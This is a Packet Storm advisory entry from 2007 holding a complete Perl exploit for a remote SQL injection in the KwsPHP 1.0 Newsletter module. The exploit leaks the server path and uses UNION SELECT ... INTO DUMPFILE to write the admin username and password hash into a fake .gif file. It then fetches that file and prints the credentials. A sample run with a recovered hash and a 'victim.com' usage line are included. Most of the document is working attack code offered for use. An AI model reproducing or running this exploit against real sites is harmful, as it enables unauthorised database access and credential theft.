kwsphpnews-sql.txt

2007-10-12T00:00:00
ID PACKETSTORM:60034
Type packetstorm
Reporter S4mi
Modified 2007-10-12T00:00:00

Description

                                        
                                            `##################################################  
# Script....................................: KwsPHP ver 1.0 Newsletter Module  
# Script Site...........................: http://www.kwsphp.org  
# Vulnerability........................: Remote SQL injection Exploit  
# Access..................................: Remote  
# level......................................: Dangerous  
# Author..................................: S4mi   
# Contact.................................: S4mi[at]LinuxMail.org   
##################################################  
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 .....  
#  
##################################################  
#This Exploit Only When magic_quotes_gpc Is OFF  
#Vuln Files:  
#\modules\newsletter\index.php  
# [code]  
#  
# line: 94 $req = reqmysql('SELECT pseudo,email FROM users WHERE email="'.$newsletter.'"') ;  
# line: 95 $rep1 = mysql_fetch_object($req) ;  
#   
# [/code]  
#  
#**************************************************************************  
  
#Screen shot  
#----------------  
#C:\>KwsPHP.pl 127.0.0.1 /KwsPHP/  
  
# Connecting .....[OK]  
# Sending Data ...[OK]  
  
#+ Getting the Full path.  
#+ ---------------- +  
#+ path: c:\public_html\kwsphp\  
  
# Connecting .....[OK]  
# Sending Data ...[OK]  
  
#+ Getting the injected code.  
#+ ---------------- +  
#127.0.0.1/KwsPHP//index.php?mod=newsletter&avert_news=1&newsletter="union all select pseudo,concat(CHAR(58),CHAR(58),pass,CHAR(44)) from users where id=1 INTO DUMPFILE 'c:/public_html/kwsphp/images/l3eez.gif'/*  
#+ ---------------- +  
  
#+ injecting database.  
#+ ---------------- +  
#+ Done!  
  
# Connecting .....[OK]  
# Sending Data ...[OK]  
  
#+ Getting user info.  
#+ ---------------- +  
#+ username: admin1  
#+ Password: e10adc3949ba59abbe56e057f20f883e  
  
#C:\>  
  
###################################################  
  
#!/usr/bin/perl  
  
use IO::Socket ;  
  
&header();  
  
&usage unless(defined($ARGV[0] && $ARGV[1] ));  
  
$host = $ARGV[0];  
$path = $ARGV[1];  
  
#print "User Name: ";  
#$user = <STDIN>;  
#chop ($user);  
  
syswrite STDOUT ,"\n Connecting ...";  
  
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);  
  
die "\n Unable to connect to $host\n" unless($sock);  
  
syswrite STDOUT, "[OK]";  
  
syswrite STDOUT ,"\n Sending Data ...";  
  
print $sock "GET $path/index.php?mod=newsletter&avert_news=1&newsletter=\" HTTP/1.1\n";  
print $sock "Host: $host\n";  
print $sock "Referer: $host\n";  
print $sock "Accept-Language: en-us\n";  
print $sock "Content-Type: application/x-www-form-urlencoded\n";  
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";  
print $sock "Cache-Control: no-cache\n";  
print $sock "Connection: Close\n\n";  
syswrite STDOUT ,"[OK]\n\n";  
  
while($answer = <$sock>){  
  
if ($answer =~ /in <b>(.*?)\modul(.*?)92/){  
print "+ Getting the Full path.\n";  
print "+ ---------------- +\n";  
print "+ path: $1\n";  
  
# here we need to replace the "\" by "/" in the $1 for the Windoz Servers (didn't   
$localpath = $1;  
$fullpath = $localpath."images/l3eez.gif";  
}  
  
else  
{  
print "\Can't find the full path\n";  
exit(0);  
}  
}  
  
$inject = "union all select pseudo,concat(CHAR(58),CHAR(58),pass,CHAR(44)) from users where id=1 INTO DUMPFILE '$fullpath'/*";  
  
syswrite STDOUT ,"\n Connecting ...";  
  
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);  
  
die "\n Unable to connect to $host\n" unless($sock);  
  
syswrite STDOUT, "[OK]";  
  
syswrite STDOUT ,"\n Sending Data ...";  
print $sock "GET $path/index.php?mod=newsletter&avert_news=1&newsletter=\"$inject HTTP/1.1\n";  
print $sock "Host: $host\n";  
print $sock "Referer: $host\n";  
print $sock "Accept-Language: en-us\n";  
print $sock "Content-Type: application/x-www-form-urlencoded\n";  
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";  
print $sock "Cache-Control: no-cache\n";  
print $sock "Connection: Close\n\n";  
syswrite STDOUT ,"[OK]\n\n";  
  
  
print "+ Getting the injected code.\n";  
print "+ ---------------- +\n";  
print "$host$path/index.php?mod=newsletter&avert_news=1&newsletter=\"$inject \n";  
print "+ ---------------- +\n\n";  
print "+ injecting database.\n";  
print "+ ---------------- +\n";  
  
  
#here need to connect to the new created file created from the sql injection (user::password,)  
syswrite STDOUT ,"\n Connecting ...";  
  
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);  
  
die "\n Unable to connect to $host\n" unless($sock);  
  
syswrite STDOUT, "[OK]";  
  
syswrite STDOUT ,"\n Sending Data ...";  
  
print $sock "GET $path/images/l3eez.gif HTTP/1.1\n";  
print $sock "Host: $host\n";  
print $sock "Referer: $host\n";  
print $sock "Accept-Language: en-us\n";  
print $sock "Content-Type: application/x-www-form-urlencoded\n";  
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";  
print $sock "Cache-Control: no-cache\n";  
print $sock "Connection: Close\n\n";  
syswrite STDOUT ,"[OK]\n\n";  
  
  
while($answer = <$sock>){  
  
if ($answer =~ /(.*?)::(.*?),/){  
print "+ Getting user info.\n";  
print "+ ---------------- +\n";  
print "+ username: $1\n";  
print "+ Password: $2\n";  
}  
}  
  
sub usage{  
print "\nUsage : perl $0 host /path/ ";  
print "\nExemple : perl $0 www.victim.com /KwsPHP/\n";  
exit(0);  
}  
sub header(){  
print q(  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
# Script......................: KwsPHP ver 1.0 Newsletter Module  
# Script Site.................: http://www.kwsphp.org  
# Vulnerability...............: Remote SQL injection Exploit  
# Access......................: Remote  
# level.......................: Dangerous  
# Author......................: S4mi   
# Contact.....................: S4mi[at]LinuxMail.org   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
);  
}  
  
`